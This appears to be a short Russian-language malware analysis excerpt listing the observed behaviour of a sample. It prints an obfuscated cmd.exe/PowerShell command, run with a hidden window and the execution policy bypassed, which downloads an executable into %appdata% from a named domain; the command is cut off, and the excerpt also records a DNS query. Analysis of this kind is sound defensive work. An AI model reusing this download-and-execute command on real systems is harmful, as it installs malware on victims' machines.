Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^e^rsHe^lL^.E^X^E^ -EXecut^IOnPOl^icy^ ^By^pASS -^N^OPR^Of^i^L^e ^-Wi^N^d^ow^S^tYLE HI^d^D^eN (nE^W^-^Objec^t sysTEm^.^net.WEBclI^E^Nt^)^.DOWNLo^a^dFIl^E('http://flowers-...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "pow^e^rsHe^lL^.E^X^E^ -EXecut^IOnPOl^icy^ ^By^pASS -^N^OPR^Of^i^L^e ^-Wi^N^d^ow^S^tYLE HI^d^D^eN (nE^W^-^Objec^t sysTEm^.^net.WEBclI^E^Nt^)^.DOWNLo^a^dFIl^E('http://flowers-...' (со скрытым окном)